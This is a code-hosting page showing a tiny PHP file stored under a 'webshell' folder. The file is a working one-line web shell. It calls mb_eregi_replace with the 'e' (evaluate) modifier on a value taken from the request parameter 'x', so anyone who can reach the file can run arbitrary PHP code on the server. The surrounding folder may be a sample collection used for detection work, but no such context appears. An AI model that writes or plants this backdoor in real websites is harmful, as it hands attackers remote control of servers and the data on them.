webshell/php/2020.08.20.15.php

4 lines
64 B
PHP
Raw Normal View History

<?php
mb_eregi_replace('\d', $_REQUEST['x'], '1', 'e');
?>